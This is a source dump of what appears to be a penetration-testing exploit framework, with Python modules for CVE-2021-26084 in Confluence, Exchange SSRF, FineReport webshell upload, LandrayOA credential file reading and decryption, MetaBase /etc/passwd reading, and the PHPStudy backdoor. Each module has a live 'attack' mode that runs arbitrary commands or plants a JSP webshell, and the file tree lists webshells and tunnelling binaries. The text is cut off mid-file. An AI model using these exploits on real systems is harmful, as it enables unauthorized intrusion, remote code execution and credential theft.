├── ClassCongregation.py ├── CodeTest.bat ├── CodeTest.pyw ├── EXP ├── ALL.py ├── ApacheShiro.py ├── ApacheSolr.py ├── ApacheStruts2.py ├── ApacheTomcat.py ├── AtlassianConfluence.py ├── Exchange.py ├── FHAdmin.py ├── Fastjson.py ├── FineReport.py ├── LandrayOA.py ├── MetaBase.py ├── OracleWeblogic.py ├── PHPStudy.py ├── ThinkPHP.py ├── Tongda.py ├── WindowsSMBv3.py └── __init__.py ├── POC ├── ByPass403.py ├── ByWAF_Mysql.py ├── Editor_vul.py ├── FHAdmin.py ├── FOFA.py ├── Fastjson_RCE.py ├── Fckeditor.py ├── GetCMS.py ├── GoogleHacking.py ├── IIS_MS15-034_Range_bytes.py ├── IIS_shortname_Scan.py ├── JSFinder.py ├── JSencode.py ├── LinkFinder.py ├── Log4j-scan.py ├── Nginx_iis_scan.py ├── Redis_unauthorized_access.py ├── Scan_zip.py ├── Shiro_poc_DNS.py ├── SpringBootVulExploit.py ├── Struts2Scan.py ├── Swagger-exp.py ├── TPscan.py ├── ThinkAdmin.py ├── ThinkphpVersion.py ├── Thinkphp_5_0_23_rce.py ├── Thinkphp_5_rce_1.py ├── Tomcat_Ajp-lfi.py ├── Tomcat_http_put.py ├── Tongda_cookie_11_4.py ├── Tongda_rce_11_4.py ├── Tongda_v11_4_rce_getshell.py ├── URL_getTitle.py ├── Weaver-Ecology-OA_RCE-EXP.py ├── WeblogicScan.py ├── Weblogic_GIOP.py ├── Weblogic_T3.py ├── Weblogic_weakPass.py ├── __init__.py ├── js_examples │ ├── enpassword.js │ ├── md5.js │ └── top100password.txt ├── webshell_asp.py ├── webshell_aspx.py ├── webshell_aspx_D.py ├── webshell_jsp.py ├── webshell_php.py ├── webshell_php_D.py ├── xcdn.py └── 模板.py ├── Proxy ├── WebRequest.py ├── __init__.py ├── handler │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── configHandler.cpython-37.pyc │ │ ├── logHandler.cpython-37.pyc │ │ └── proxyHandler.cpython-37.pyc │ ├── configHandler.py │ ├── logHandler.py │ └── proxyHandler.py ├── helper │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── check.cpython-37.pyc │ │ ├── proxy.cpython-37.pyc │ │ └── validator.cpython-37.pyc │ ├── check.py │ ├── fetch.py │ ├── proxy.py │ └── validator.py ├── ips.txt ├── log │ ├── Apache Shiro │ └── test.log ├── proxyFetcher.py ├── proxySetting.py ├── sqlmap_auto_proxy.bat ├── sqlmap_auto_proxy.py └── util │ ├── __init__.py │ ├── lazyProperty.py │ ├── singleton.py │ └── six.py ├── README.md ├── Template ├── EXP.j2 ├── POC.j2 └── __init__.py ├── data ├── api-docs.json ├── bool_blind.xml ├── error.xml └── time_blind.xml ├── execScripts ├── Caidao_cmd.jsp ├── Caidao_shell.asp ├── Caidao_shell.aspx └── Caidao_shell.php ├── img ├── 1.png └── 2.png ├── lib ├── green.png ├── note.txt └── red.png ├── log └── info.txt ├── payload_html ├── Ueditor │ ├── Ueditor.html │ └── ueditor.png ├── chrome_payload.html ├── key.sh ├── kindeditor.html ├── npc ├── npc.exe ├── nps └── wget.exe ├── python.ico ├── requirements.txt ├── settings.py └── util ├── ExpRequest.py └── globalvar.py /CodeTest.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | if "%1" == "h" goto begin 3 | mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit 4 | :begin 5 | python3 -B CodeTest.pyw -------------------------------------------------------------------------------- /EXP/ALL.py: -------------------------------------------------------------------------------- 1 | import sys,importlib,glob,os,datetime 2 | sys.path.append('../') 3 | #from concurrent.futures import ThreadPoolExecutor,wait,as_completed,ALL_COMPLETED 4 | from ClassCongregation import color 5 | 6 | vuln_scripts = [] 7 | exp_scripts = [] 8 | for _ in glob.glob('EXP/*.py'): 9 | script_name = os.path.basename(_).replace('.py', '') 10 | if script_name != 'ALL' and script_name != '__init__': 11 | vuln_name = importlib.import_module('.%s'%script_name,package='EXP') 12 | exp_scripts.append(script_name) 13 | vuln_scripts.append(vuln_name) 14 | 15 | def check(**kwargs): 16 | result = '' 17 | now = datetime.datetime.now() 18 | color ("["+str(now)[11:19]+"] " + "[+] Scanning target domain "+kwargs['url'], 'green') 19 | #批量调用 20 | for index in range(len(vuln_scripts)): 21 | try: 22 | result += vuln_scripts[index].check(**kwargs)+'\n' 23 | except Exception as e: 24 | now = datetime.datetime.now() 25 | color ("["+str(now)[11:19]+"] " + "[-] Running {} occured error!!!".format(exp_scripts[index]), 'yellow') 26 | continue 27 | return result 28 | #executor = ThreadPoolExecutor(max_workers = 3) 29 | #for data in executor.map(lambda kwargs: check(**kwargs),vuln_scripts): 30 | # pass -------------------------------------------------------------------------------- /EXP/AtlassianConfluence.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | import prettytable as pt 4 | """ 5 | cve_2016_4437 反序列化命令执行(可回显) 6 | 目标系统: windows、linux 7 | """ 8 | class AtlassianConfluence(): 9 | def __init__(self, **env): 10 | """ 11 | 基础参数初始化 12 | """ 13 | self.url = env.get('url') 14 | self.cookie = env.get('cookie') 15 | self.cmd = env.get('cmd') 16 | self.pocname = env.get('pocname') 17 | self.vuln = env.get('vuln') 18 | self.timeout = int(env.get('timeout')) 19 | self.retry_time = int(env.get('retry_time')) 20 | self.retry_interval = int(env.get('retry_interval')) 21 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 22 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 23 | self.status = env.get('status') 24 | 25 | def cve_2021_26084(self): 26 | appName = 'Atlassian Confluence' 27 | pocname = 'cve_2021_26084' 28 | path = '/' 29 | method = 'post' 30 | desc = '<6.13.23, 6.14.0~7.4.11, 7.5.0~7.11.5, 7.12.0~7.12.5' 31 | fofa = 'Atlassian Confluence' 32 | #输出类 33 | output = Output(pocname) 34 | #请求类 35 | exprequest = ExpRequest(pocname, output) 36 | 37 | try: 38 | #_verify 39 | if self.vuln == 'False': 40 | paramsPost = {"queryString":"aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"} 41 | headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"} 42 | response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False) 43 | if "aaa{class java.lang.String=null}bbb" in response.text: 44 | output.no_echo_success(method, desc) 45 | self.status = 'success' 46 | else: 47 | output.fail() 48 | 49 | #_attack 50 | else: 51 | paramsPost = {"queryString":"kkk\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var x=new java.lang.ProcessBuilder;x.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027" + self.cmd + "\\u0027]);x.start()\\u0022)}+\\u0027"} 52 | headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"} 53 | response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False) 54 | if "kkk{Process" in response.text: 55 | output.no_echo_success(method, desc) 56 | else: 57 | output.fail() 58 | except Exception as error: 59 | output.error_output(str(error)) 60 | 61 | tb = pt.PrettyTable() 62 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description'] 63 | tb.align['Target type'] = 'l' 64 | tb.align['Vuln Name'] = 'l' 65 | tb.align['Impact Version && Vulnerability description'] = 'l' 66 | tb.add_row(["Atlassian Confluence", "cve_2021_26084", "body=\"Atlassian Confluence\" , [rce]"]) 67 | print(tb) 68 | 69 | def check(**kwargs): 70 | result_list = [] 71 | result_list.append('----------------------------') 72 | ExpAtlassianConfluence = AtlassianConfluence(**kwargs) 73 | if kwargs['pocname'] != 'ALL': 74 | func = getattr(ExpAtlassianConfluence, kwargs['pocname'])#返回对象函数属性值,可以直接调用 75 | func()#调用函数 76 | return ExpAtlassianConfluence.status 77 | else:#调用所有函数 78 | for func in dir(AtlassianConfluence): 79 | if not func.startswith("__"): 80 | methodcaller(func)(ExpAtlassianConfluence) 81 | result_list.append(func+' -> '+ExpAtlassianConfluence.status) 82 | ExpAtlassianConfluence.status = 'fail' 83 | result_list.append('----------------------------') 84 | return '\n'.join(result_list) 85 | -------------------------------------------------------------------------------- /EXP/Exchange.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest, Output 2 | from ClassCongregation import Dnslog 3 | from operator import methodcaller 4 | """ 5 | Exchange_SSRF [ssrf] 6 | """ 7 | class Exchange(): 8 | def __init__(self, **env): 9 | """ 10 | 基础参数初始化 11 | """ 12 | self.url = env.get('url') 13 | self.cookie = env.get('cookie') 14 | self.cmd = env.get('cmd') 15 | self.pocname = env.get('pocname') 16 | self.vuln = env.get('vuln') 17 | self.timeout = int(env.get('timeout')) 18 | self.retry_time = int(env.get('retry_time')) 19 | self.retry_interval = int(env.get('retry_interval')) 20 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 21 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 22 | self.status = env.get('status') 23 | 24 | def Exchange_SSRF(self): 25 | appName = 'Exchange:Exchange_SSRF' 26 | pocname = 'Exchange_SSRF' 27 | path = '/owa/auth/x.js' 28 | method = 'get' 29 | desc = 'Apache Tomcat: Examples File' 30 | info = "[ssrf]" 31 | payload = '' 32 | cookie = 'X-AnonResource=true;X-AnonResource-Backend={}/ecp/default.flt?~3;X-BEResource={}/owa/auth/logon.aspx?~3;' 33 | #输出类 34 | output = Output(pocname) 35 | #请求类 36 | exprequest = ExpRequest(pocname, output) 37 | try: 38 | #_verify 39 | if self.vuln == 'False': 40 | dnslog = Dnslog() 41 | exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(dnslog.dns_host(), dnslog.dns_host())}, timeout=self.timeout, verify=False) 42 | if dnslog.result(): 43 | output.echo_success(method, info) 44 | self.status = 'success' 45 | else: 46 | output.fail() 47 | #_attack 48 | else: 49 | request = exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(self.cmd, self.cmd)}, timeout=self.timeout, verify=False) 50 | print(request.text) 51 | except Exception as error: 52 | output.error_output(str(error)) 53 | 54 | def check(**kwargs): 55 | result_list = [] 56 | result_list.append('----------------------------') 57 | ExpExchange = Exchange(**kwargs) 58 | if kwargs['pocname'] != "ALL": 59 | func = getattr(ExpExchange, kwargs['pocname'])#返回对象函数属性值,可以直接调用 60 | func()#调用函数 61 | return ExpExchange.status 62 | else:#调用所有函数 63 | for func in dir(Exchange): 64 | if not func.startswith("__"): 65 | methodcaller(func)(ExpExchange) 66 | result_list.append(func+' -> '+ExpExchange.status) 67 | ExpExchange.status = 'fail' 68 | result_list.append('----------------------------') 69 | return '\n'.join(result_list) 70 | -------------------------------------------------------------------------------- /EXP/FHAdmin.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | """ 4 | import util.globalvar as GlobalVar 5 | from ClassCongregation import ysoserial_payload,Dnslog 6 | DL = Dnslog() 7 | DL.dns_host() 8 | DL.result() 9 | """ 10 | class FHAdmin(): 11 | def __init__(self, **env): 12 | """ 13 | 基础参数初始化 14 | """ 15 | self.url = env.get('url') 16 | self.cookie = env.get('cookie') 17 | self.cmd = env.get('cmd') 18 | self.pocname = env.get('pocname') 19 | self.vuln = env.get('vuln') 20 | self.timeout = int(env.get('timeout')) 21 | self.retry_time = int(env.get('retry_time')) 22 | self.retry_interval = int(env.get('retry_interval')) 23 | self.status = env.get('status') 24 | 25 | def cve_20210824_upload(self): 26 | appName = 'FHAdmin' 27 | pocname = 'cve_20210824_upload' 28 | path = '/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/' 29 | method = 'post' 30 | desc = '[upload] 任意文件上传+shiro权限绕过' 31 | data = '--6aaf12c632ee6febfc354d1ba1bc914b\r\nContent-Disposition: form-data; name="imgFile"; filename="a5s_9y.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n123\r\n--6aaf12c632ee6febfc354d1ba1bc914b--' 32 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'multipart/form-data; boundary=6aaf12c632ee6febfc354d1ba1bc914b'} 33 | #输出类 34 | output = Output(pocname) 35 | #请求类 36 | exprequest = ExpRequest(pocname, output) 37 | try: 38 | if self.vuln == 'False': 39 | r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False) 40 | if r"2021" in r.text: 41 | print(r.text) 42 | self.status = 'success' 43 | output.no_echo_success(method, desc) 44 | else: 45 | output.fail() 46 | else: 47 | result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text 48 | print(self.url+'/;/plugins/uploadify/'+result.strip('\r\n')+'\n\n'+data) 49 | except Exception as error: 50 | output.error_output(str(error)) 51 | 52 | def check(**kwargs): 53 | result_list = [] 54 | result_list.append('----------------------------') 55 | ExpFHAdmin = FHAdmin(**kwargs) 56 | if kwargs['pocname'] != 'ALL': 57 | func = getattr(ExpFHAdmin, kwargs['pocname'])#返回对象函数属性值,可以直接调用 58 | func()#调用函数 59 | return ExpFHAdmin.status 60 | else:#调用所有函数 61 | for func in dir(FHAdmin): 62 | if not func.startswith("__"): 63 | methodcaller(func)(ExpFHAdmin) 64 | result_list.append(func+' -> '+ExpFHAdmin.status) 65 | ExpFHAdmin.status = 'fail' 66 | result_list.append('----------------------------') 67 | return '\n'.join(result_list) 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /EXP/FineReport.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from ClassCongregation import random_name 3 | from operator import methodcaller 4 | import re 5 | """ 6 | --FineReport-- 7 | CVE_20210408 [upload],默认self.vuln = None 8 | """ 9 | class FineReport(): 10 | def __init__(self, **env): 11 | """ 12 | 基础参数初始化 13 | """ 14 | self.url = env.get('url') 15 | self.cookie = env.get('cookie') 16 | self.cmd = env.get('cmd') 17 | self.pocname = env.get('pocname') 18 | self.vuln = env.get('vuln') 19 | self.timeout = int(env.get('timeout')) 20 | self.retry_time = int(env.get('retry_time')) 21 | self.retry_interval = int(env.get('retry_interval')) 22 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 23 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 24 | self.status = env.get('status') 25 | 26 | def CVE_20210408_FineReport(self): 27 | appName = 'FineReport' 28 | pocname = 'CVE_20210408' 29 | method = 'post' 30 | desc = 'FineReport:CVE_20210408' 31 | info = '[upload]' 32 | path = r'/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/' 33 | payload_verify = r'{"__CONTENT__":"VuLnEcHoPoCSuCCeSS","__CHARSET__":"UTF-8"}' 34 | payload = r'{"__CONTENT__":"<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>","__CHARSET__":"UTF-8"}' 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 37 | 'Connection': 'close', 38 | 'Accept-Encoding': 'gzip, deflate', 39 | 'Accept': '*/*', 40 | 'Content-Type': 'text/xml;charset=UTF-8', 41 | 'Accept-Au': '0c42b2f264071be0507acea1876c74' 42 | } 43 | #输出类 44 | output = Output(pocname) 45 | #请求类 46 | exprequest = ExpRequest(pocname, output) 47 | name = random_name(6)+'.jsp' 48 | path += name 49 | try: 50 | #_verify 51 | if self.vuln == 'False': 52 | request = exprequest.post(self.url + path, data=payload_verify, headers=headers, timeout=self.timeout, verify=False) 53 | request = exprequest.get(self.url + '/WebReport/' + name, headers=headers, timeout=self.timeout, verify=False) 54 | if 'VuLnEcHoPoCSuCCeSS' in request.text: 55 | output.echo_success(method, info) 56 | self.status = 'success' 57 | else: 58 | output.fail() 59 | #_attack 60 | else: 61 | request = exprequest.post(self.url + path, data=payload, headers=headers, timeout=self.timeout, verify=False) 62 | print(self.url + path) 63 | except Exception as error: 64 | output.error_output(str(error)) 65 | 66 | def check(**kwargs): 67 | result_list = [] 68 | result_list.append('----------------------------') 69 | ExpFineReport = FineReport(**kwargs) 70 | if kwargs['pocname'] != 'ALL': 71 | func = getattr(ExpFineReport, kwargs['pocname'])#返回对象函数属性值,可以直接调用 72 | func()#调用函数 73 | return ExpFineReport.status 74 | else:#调用所有函数 75 | for func in dir(FineReport): 76 | if not func.startswith("__"): 77 | methodcaller(func)(ExpFineReport) 78 | result_list.append(func+' -> '+ExpFineReport.status) 79 | ExpFineReport.status = 'fail' 80 | result_list.append('----------------------------') 81 | return '\n'.join(result_list) 82 | 83 | -------------------------------------------------------------------------------- /EXP/LandrayOA.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from ClassCongregation import des_dec 3 | from operator import methodcaller 4 | import prettytable as pt 5 | import re 6 | """ 7 | import util.globalvar as GlobalVar 8 | from ClassCongregation import ysoserial_payload,Dnslog 9 | DL = Dnslog() 10 | DL.dns_host() 11 | DL.result() 12 | """ 13 | class LandrayOA(): 14 | def __init__(self, **env): 15 | """ 16 | 基础参数初始化 17 | """ 18 | self.url = env.get('url') 19 | self.cookie = env.get('cookie') 20 | self.cmd = env.get('cmd') 21 | self.pocname = env.get('pocname') 22 | self.vuln = env.get('vuln') 23 | self.timeout = int(env.get('timeout')) 24 | self.retry_time = int(env.get('retry_time')) 25 | self.retry_interval = int(env.get('retry_interval')) 26 | self.status = env.get('status') 27 | 28 | def cve_custom_filereading(self): 29 | appName = 'LandrayOA' 30 | pocname = 'cve_custom_filereading' 31 | path = '/sys/ui/extend/varkind/custom.jsp' 32 | method = 'post' 33 | desc = '[file reading] app="Landray-OA系统"' 34 | data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' 35 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'} 36 | #输出类 37 | output = Output(pocname) 38 | #请求类 39 | exprequest = ExpRequest(pocname, output) 40 | try: 41 | if self.vuln == 'False': 42 | r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False) 43 | if r"password" in r.text: 44 | self.status = 'success' 45 | output.no_echo_success(method, desc) 46 | else: 47 | output.fail() 48 | else: 49 | result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text 50 | pwd = re.search(r'password = (.*)\\r', result).group(1) 51 | #默认只取前8位密钥 52 | pwd = des_dec(pwd, 'kmssAdminKey'[0:8]) 53 | print('[+]登录地址: %s ,登录密码: %s'%(self.url+'/admin.do',pwd)) 54 | except Exception as error: 55 | output.error_output(str(error)) 56 | 57 | tb = pt.PrettyTable() 58 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description'] 59 | tb.align['Target type'] = 'l' 60 | tb.align['Vuln Name'] = 'l' 61 | tb.align['Impact Version && Vulnerability description'] = 'l' 62 | tb.add_row([ 63 | "LandrayOA", 64 | "cve_custom_filereading", 65 | "[file reading] app=\"Landray-OA系统\"" 66 | ]) 67 | print(tb) 68 | 69 | def check(**kwargs): 70 | result_list = [] 71 | result_list.append('----------------------------') 72 | ExpLandrayOA = LandrayOA(**kwargs) 73 | if kwargs['pocname'] != 'ALL': 74 | func = getattr(ExpLandrayOA, kwargs['pocname'])#返回对象函数属性值,可以直接调用 75 | func()#调用函数 76 | return ExpLandrayOA.status 77 | else:#调用所有函数 78 | for func in dir(LandrayOA): 79 | if not func.startswith("__"): 80 | methodcaller(func)(ExpLandrayOA) 81 | result_list.append(func+' -> '+ExpLandrayOA.status) 82 | ExpLandrayOA.status = 'fail' 83 | result_list.append('----------------------------') 84 | return '\n'.join(result_list) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | -------------------------------------------------------------------------------- /EXP/MetaBase.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | import prettytable as pt 4 | """ 5 | import util.globalvar as GlobalVar 6 | from ClassCongregation import ysoserial_payload,Dnslog 7 | DL = Dnslog() 8 | DL.dns_host() 9 | DL.result() 10 | """ 11 | class MetaBase(): 12 | def __init__(self, **env): 13 | """ 14 | 基础参数初始化 15 | """ 16 | self.url = env.get('url') 17 | self.cookie = env.get('cookie') 18 | self.cmd = env.get('cmd') 19 | self.pocname = env.get('pocname') 20 | self.vuln = env.get('vuln') 21 | self.timeout = int(env.get('timeout')) 22 | self.retry_time = int(env.get('retry_time')) 23 | self.retry_interval = int(env.get('retry_interval')) 24 | self.status = env.get('status') 25 | 26 | def cve_MetaBase_20211123(self): 27 | appName = 'MetaBase' 28 | pocname = 'cve_MetaBase_20211123' 29 | path = '/api/geojson?url=file:/etc/passswd' 30 | method = 'get' 31 | desc = '[file reading] metabase version >= 1.0.0, < 1.40.5' 32 | data = '' 33 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*'} 34 | #输出类 35 | output = Output(pocname) 36 | #请求类 37 | exprequest = ExpRequest(pocname, output) 38 | try: 39 | if self.vuln == 'False': 40 | r = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False) 41 | if r"root:x" in r.text: 42 | self.status = 'success' 43 | output.no_echo_success(method, desc) 44 | else: 45 | output.fail() 46 | else: 47 | result = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text 48 | print(result) 49 | except Exception as error: 50 | output.error_output(str(error)) 51 | 52 | tb = pt.PrettyTable() 53 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description'] 54 | tb.align['Target type'] = 'l' 55 | tb.align['Vuln Name'] = 'l' 56 | tb.align['Impact Version && Vulnerability description'] = 'l' 57 | tb.add_row([ 58 | "MetaBase", 59 | "cve_MetaBase_20211123", 60 | "[file reading] metabase version >= 1.0.0, < 1.40.5" 61 | ]) 62 | print(tb) 63 | 64 | def check(**kwargs): 65 | result_list = [] 66 | result_list.append('----------------------------') 67 | ExpMetaBase = MetaBase(**kwargs) 68 | if kwargs['pocname'] != 'ALL': 69 | func = getattr(ExpMetaBase, kwargs['pocname'])#返回对象函数属性值,可以直接调用 70 | func()#调用函数 71 | return ExpMetaBase.status 72 | else:#调用所有函数 73 | for func in dir(MetaBase): 74 | if not func.startswith("__"): 75 | methodcaller(func)(ExpMetaBase) 76 | result_list.append(func+' -> '+ExpMetaBase.status) 77 | ExpMetaBase.status = 'fail' 78 | result_list.append('----------------------------') 79 | return ''.join(result_list).strip('\n') 80 | -------------------------------------------------------------------------------- /EXP/PHPStudy.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | from ClassCongregation import Dnslog#通过Dnslog判断 4 | import base64 5 | import time 6 | class PHPStudy(): 7 | def __init__(self, **env): 8 | """ 9 | 基础参数初始化 10 | """ 11 | self.url = env.get('url') 12 | self.cookie = env.get('cookie') 13 | self.cmd = env.get('cmd') 14 | self.pocname = env.get('pocname') 15 | self.vuln = env.get('vuln') 16 | self.timeout = int(env.get('timeout')) 17 | self.retry_time = int(env.get('retry_time')) 18 | self.retry_interval = int(env.get('retry_interval')) 19 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 20 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 21 | self.status = env.get('status') 22 | 23 | def PHPStudyBackdoor(self): 24 | DL = Dnslog() #申请dnslog地址 25 | appName = 'PHPStudy' 26 | pocname = 'PHPStudyBackdoor' 27 | path = '/index.php' 28 | method = 'get' 29 | desc = 'PHPStudyBackdoor脚本漏洞' 30 | payload = ('''system("ping {}");''').format(DL.dns_host()) 31 | payload = base64.b64encode(payload.encode('utf-8')) 32 | Headers = { 33 | 'Sec-Fetch-Mode' : 'navigate', 34 | 'Sec-Fetch-User' : '?1', 35 | 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 36 | 'Sec-Fetch-Site' : 'none', 37 | 'accept-charset' : payload 38 | } 39 | #输出类 40 | output = Output(pocname) 41 | #请求类 42 | exprequest = ExpRequest(pocname, output) 43 | 44 | try: 45 | exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False) 46 | time.sleep(2) 47 | if DL.result(): 48 | info = "存在phpStudyBackdoor脚本漏洞, Payload:{}".format(payload) 49 | output.echo_success(method, info) 50 | self.status = 'success' 51 | else: 52 | output.fail() 53 | except Exception as error: 54 | output.error_output(str(error)) 55 | 56 | def PHPStudyphpmyadmin(self): 57 | appName = 'PHPStudy' 58 | pocname = 'PHPStudyphpmyadmin' 59 | path = "/phpmyadmin/index.php" 60 | method = 'post' 61 | desc = 'phpstudy_phpmyadmin默认密码漏洞' 62 | payload = { 63 | "pma_username": "root", 64 | "pma_password": "root", 65 | "server": "1", 66 | "target": "index.php" 67 | } 68 | Headers = { 69 | 'Accept' : '*/*', 70 | 'Content-Type' : 'application/x-www-form-urlencoded' 71 | } 72 | #输出类 73 | output = Output(pocname) 74 | #请求类 75 | exprequest = ExpRequest(pocname, output) 76 | 77 | try: 78 | resp = exprequest.post(self.url+path, data=payload, headers=Headers, timeout=self.timeout, verify=False).text 79 | resp2 = exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False).text 80 | 81 | if resp2.lower().find('navigation.php')!=-1 and resp.lower().find('frame_navigation')!=-1: 82 | info = "存在phpstudy_phpmyadmin默认密码漏洞" 83 | output.echo_success(method, info) 84 | self.status = 'success' 85 | else: 86 | output.fail() 87 | except Exception as error: 88 | output.error_output(str(error)) 89 | 90 | def PHPStudyProbe(self): 91 | appName = 'PHPStudy' 92 | pocname = 'PHPStudyProbe' 93 | path = '/l.php' 94 | method = 'get' 95 | desc = 'PHPStudy探针泄露漏洞' 96 | #输出类 97 | output = Output(pocname) 98 | #请求类 99 | exprequest = ExpRequest(pocname, output) 100 | 101 | try: 102 | resp = exprequest.get(self.url+path, timeout=self.timeout, verify=False).text 103 | 104 | if resp.lower().find('php_version')!=-1 and resp.lower().find('phpstudy')!=-1: 105 | info = "存在phpstudy探针泄露漏洞" 106 | output.echo_success(method, info) 107 | self.status = 'success' 108 | else: 109 | output.fail() 110 | except Exception as error: 111 | output.error_output(str(error)) 112 | 113 | def check(**kwargs): 114 | result_list = [] 115 | result_list.append('----------------------------') 116 | ExpPHPStudy = PHPStudy(**kwargs) 117 | if kwargs['pocname'] != 'ALL': 118 | func = getattr(ExpPHPStudy, kwargs['pocname'])#返回对象函数属性值,可以直接调用 119 | func()#调用函数 120 | return ExpPHPStudy.status 121 | else:#调用所有函数 122 | for func in dir(PHPStudy): 123 | if not func.startswith("__"): 124 | methodcaller(func)(ExpPHPStudy) 125 | result_list.append(func+' -> '+ExpPHPStudy.status) 126 | ExpPHPStudy.status = 'fail' 127 | result_list.append('----------------------------') 128 | return '\n'.join(result_list) 129 | 130 | 131 | -------------------------------------------------------------------------------- /EXP/WindowsSMBv3.py: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | import socket 4 | import struct 5 | class WindowsSMBv3(): 6 | def __init__(self, **env): 7 | """ 8 | 基础参数初始化 9 | """ 10 | self.url = env.get('url') 11 | self.cookie = env.get('cookie') 12 | self.cmd = env.get('cmd') 13 | self.pocname = env.get('pocname') 14 | self.vuln = env.get('vuln') 15 | self.timeout = int(env.get('timeout')) 16 | self.retry_time = int(env.get('retry_time')) 17 | self.retry_interval = int(env.get('retry_interval')) 18 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 19 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS') 20 | self.status = env.get('status') 21 | 22 | def CVE_2020_0796(self): 23 | appName = 'Windows' 24 | pocname = 'CVE_2020_0796' 25 | method = 'socket' 26 | payload = 